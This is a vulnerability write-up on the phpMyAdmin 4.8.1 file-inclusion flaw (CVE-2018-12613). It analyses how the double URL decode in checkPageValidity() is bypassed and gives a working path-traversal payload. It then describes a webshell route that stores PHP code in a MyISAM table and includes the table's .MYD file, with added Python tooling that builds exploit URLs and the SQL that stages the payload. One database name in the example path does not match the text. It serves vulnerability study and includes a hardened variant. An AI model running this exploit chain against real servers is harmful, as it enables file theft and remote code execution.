phpMyAdmin 4.8.1 arbitrary file inclusion
0x00 About phpMyAdmin
phpMyAdmin is a PHP, web-based MySQL database management tool that runs on the web server and lets administrators manage MySQL databases through a browser. The web interface is a convenient way to enter complex SQL, and it is especially handy for importing and exporting large amounts of data. Because phpMyAdmin runs on the web server like any other PHP application, the HTML pages it produces can be used from anywhere, so MySQL databases can be administered remotely: creating, modifying and deleting databases and tables. It can also generate the SQL that a web page needs, which helps check that the SQL is correct while the page is being written.
0x01 Affected versions
phpMyAdmin 4.8.1 (this is the issue tracked as CVE-2018-12613; it was fixed in 4.8.2)
Earlier versions were not tested.
Note: a valid phpMyAdmin login is required to exploit this.
0x02 Vulnerability analysis
Look at index.php, lines 55-63:

```php
// $target_blacklist is defined earlier in index.php as array('import.php', 'export.php')
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];   // the request-controlled value is included as-is
    exit;
}
```
All of the following conditions must hold for the include to run:
- $_REQUEST['target'] must not be empty
- $_REQUEST['target'] must be a string
- $_REQUEST['target'] must not start with "index"
- $_REQUEST['target'] must not be in $target_blacklist, where $target_blacklist = array('import.php', 'export.php'); note that this is an exact comparison
- Core::checkPageValidity($_REQUEST['target']) must return true
Core::checkPageValidity() lives in libraries/classes/Core.php:

```php
public static function checkPageValidity(&$page, array $whitelist = [])
{
    if (empty($whitelist)) {
        $whitelist = self::$goto_whitelist;
    }
    if (! isset($page) || !is_string($page)) {
        return false;
    }
    // 1. exact match against the whitelist
    if (in_array($page, $whitelist)) {
        return true;
    }
    // 2. everything before the first '?' must match
    $_page = mb_substr(
        $page,
        0,
        mb_strpos($page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }
    // 3. same check again, but after URL-decoding the value a second time
    $_page = urldecode($page);
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }
    return false;
}
```
The problematic branch is the third one:

```php
$_page = urldecode($page);
$_page = mb_substr(
    $_page,
    0,
    mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
    return true;
}
```

PHP already URL-decodes the query string once when it populates $_REQUEST, so this branch decodes the value a second time. The check is therefore made on a different string than the one that is later passed to include. Putting %253f (a double-encoded "?") in the request is enough to bypass it: $_REQUEST['target'] becomes db_sql.php%3f/../../../../../../etc/passwd, which fails the exact match and the truncate-at-"?" check, but urldecode() turns it into db_sql.php?/../../../../../../etc/passwd, the substring before "?" is db_sql.php, and that is in the whitelist. include, however, receives the undecoded db_sql.php%3f/../../../../../../etc/passwd, and the ../ segments walk out of the phpMyAdmin directory. A working value is:

```
db_sql.php%253f/../../../../../../etc/passwd
```
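The following is an added example, not code from the post or from phpMyAdmin: a Python model of the index.php gate and of Core::checkPageValidity() as quoted above, so the bypass can be traced step by step offline. The whitelist is a constructed subset of the real Core::$goto_whitelist, and the "hardened" variant is my own suggestion (exact match only, and include the whitelist entry rather than the request value), not the project's actual 4.8.2 patch.

```python
"""Model of the phpMyAdmin 4.8.1 `target` gate (added example, not project code)."""
from urllib.parse import unquote_plus

# Constructed subset of Core::$goto_whitelist; the real list is longer.
GOTO_WHITELIST = ["db_sql.php", "db_structure.php", "server_sql.php",
                  "tbl_sql.php", "index.php", "import.php", "export.php"]
TARGET_BLACKLIST = ["import.php", "export.php"]   # $target_blacklist in index.php


def _before_question_mark(s: str) -> str:
    """mb_substr($s, 0, mb_strpos($s . '?', '?')): everything before the first '?'."""
    return s[: (s + "?").index("?")]


def check_page_validity(page, whitelist=GOTO_WHITELIST) -> bool:
    """Port of Core::checkPageValidity() as shipped in 4.8.1."""
    if not isinstance(page, str):
        return False
    if page in whitelist:                                   # branch 1: exact match
        return True
    if _before_question_mark(page) in whitelist:            # branch 2: cut at '?'
        return True
    decoded = unquote_plus(page)                            # branch 3: urldecode() again
    if _before_question_mark(decoded) in whitelist:
        return True
    return False


def target_gate_vulnerable(raw_query_value: str):
    """Return the path `include` would receive, or None if the gate rejects it.

    raw_query_value is the value exactly as it appears in the query string;
    PHP decodes it once when it fills $_REQUEST, which is modelled here.
    """
    target = unquote_plus(raw_query_value)
    if target in ("", "0"):            # PHP empty() is also true for "0"
        return None
    if target.startswith("index"):     # preg_match('/^index/', ...)
        return None
    if target in TARGET_BLACKLIST:     # exact comparison, so prefixes slip past
        return None
    if not check_page_validity(target):
        return None
    return target                      # include $_REQUEST['target'];


def target_gate_hardened(raw_query_value: str):
    """Hardened form (my suggestion, not the project's patch): no second decode,
    no truncation, and the included file is the whitelist entry itself."""
    target = unquote_plus(raw_query_value)
    if target.startswith("index") or target in TARGET_BLACKLIST:
        return None
    for entry in GOTO_WHITELIST:
        if target == entry:
            return entry
    return None


if __name__ == "__main__":
    poc = "db_sql.php%253f/../../../../../../etc/passwd"
    print("vulnerable includes:", target_gate_vulnerable(poc))
    print("hardened includes:  ", target_gate_hardened(poc))
```

Running the model shows why the double encoding matters: only the third branch of checkPageValidity() sees a "?", and only the undecoded string reaches include. It also shows that the `$target_blacklist` comparison is exact, so `import.php%253f/...` is not stopped by it, whereas anything starting with `index` is caught by the regex.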
db_sql.php can be replaced by any other entry of Core::$goto_whitelist:

```php
'db_datadict.php',
'db_sql.php',
'db_events.php',
'db_export.php',
'db_importdocsql.php',
'db_multi_table_query.php',
'db_structure.php',
'db_import.php',
'db_operations.php',
'db_search.php',
'db_routines.php',
'export.php',
'import.php',
'index.php',
'pdf_pages.php',
'pdf_schema.php',
'server_binlog.php',
'server_collations.php',
'server_databases.php',
'server_engines.php',
'server_export.php',
'server_import.php',
'server_privileges.php',
'server_sql.php',
'server_status.php',
'server_status_advisor.php',
'server_status_monitor.php',
'server_status_queries.php',
'server_status_variables.php',
'server_variables.php',
'sql.php',
'tbl_addfield.php',
'tbl_change.php',
'tbl_create.php',
'tbl_import.php',
'tbl_indexes.php',
'tbl_sql.php',
'tbl_export.php',
'tbl_operations.php',
'tbl_structure.php',
'tbl_relation.php',
'tbl_replace.php',
'tbl_row_action.php',
'tbl_select.php',
'tbl_zoom_select.php',
'transformation_overview.php',
'transformation_wrapper.php',
'user_password.php',
```

index.php is in the whitelist but is rejected by the preg_match('/^index/') check in index.php, so it cannot be used as the prefix.
0x03 Getting a webshell through the file inclusion
Prerequisite: you need to know the path of the MySQL data directory.
Query the current data directory:

```sql
SHOW VARIABLES LIKE 'datadir';
```

I created a database tt, added a table to it, and inserted <?php phpinfo()?> into that table. MySQL stores MyISAM row data in <datadir>/<database>/<table>.MYD, so the table must use the MyISAM engine for a .MYD file to exist (InnoDB keeps rows in .ibd files). Then visit:
http://localhost/phpMyAdmin1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/MySQL/data/tet/tt.MYD
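The following is an added example, not code from the post: small Python helpers for the .MYD step above. They build the double-encoded target value without letting the HTTP library add a third encoding layer (a common mistake when scripting this), compute the .MYD path from datadir, database and table, and generate the SQL that stages the PHP payload in a MyISAM table. The base URL, database and table names are assumptions for illustration.

```python
"""Helpers for the .MYD inclusion step (added example, not from the post)."""
import posixpath
from urllib.parse import quote, urlencode


def build_target(whitelist_page: str, abs_path: str, depth: int = 6) -> str:
    """'<page>%253f/' + '../' * depth + path, the form used in the post."""
    rel = "../" * depth + abs_path.lstrip("/")
    return f"{whitelist_page}%253f/{rel}"


def build_exploit_url(base_url: str, whitelist_page: str, abs_path: str,
                      depth: int = 6) -> str:
    """Full index.php URL. quote() must leave '%' alone: if %253f were
    re-encoded to %25253f, the second urldecode() in checkPageValidity()
    would never produce the '?' the bypass relies on."""
    target = build_target(whitelist_page, abs_path, depth)
    return f"{base_url.rstrip('/')}/index.php?target={quote(target, safe='%/')}"


def naive_exploit_url(base_url: str, whitelist_page: str, abs_path: str,
                      depth: int = 6) -> str:
    """What urlencode() produces: one encoding layer too many, so the PoC fails."""
    params = {"target": build_target(whitelist_page, abs_path, depth)}
    return f"{base_url.rstrip('/')}/index.php?{urlencode(params)}"


def myd_path(datadir: str, database: str, table: str) -> str:
    """MyISAM data file for a table: <datadir>/<database>/<table>.MYD."""
    return posixpath.join(datadir.rstrip("/"), database, table + ".MYD")


def payload_sql(database: str, table: str, php: str) -> list:
    """SQL that stages the PHP payload in a MyISAM table.
    ENGINE=MyISAM matters: InnoDB writes .ibd files, not .MYD.
    Backslashes and single quotes are escaped for a MySQL string literal."""
    escaped = php.replace("\\", "\\\\").replace("'", "''")
    return [
        f"CREATE DATABASE IF NOT EXISTS `{database}`;",
        f"CREATE TABLE `{database}`.`{table}` (`payload` TEXT) ENGINE=MyISAM;",
        f"INSERT INTO `{database}`.`{table}` VALUES ('{escaped}');",
    ]


if __name__ == "__main__":
    # Assumed values; the real datadir comes from SHOW VARIABLES LIKE 'datadir'.
    datadir, db, tbl = "/phpStudy/MySQL/data", "tt", "shell"
    for stmt in payload_sql(db, tbl, "<?php phpinfo(); ?>"):
        print(stmt)
    print(build_exploit_url("http://localhost/phpMyAdmin1", "db_sql.php",
                            myd_path(datadir, db, tbl)))
```

The depth of six "../" segments is what the post uses; adjust it to however deep the phpMyAdmin directory sits, since extra "../" at the filesystem root are harmless but too few will not reach the data directory.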
0x04 References
https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog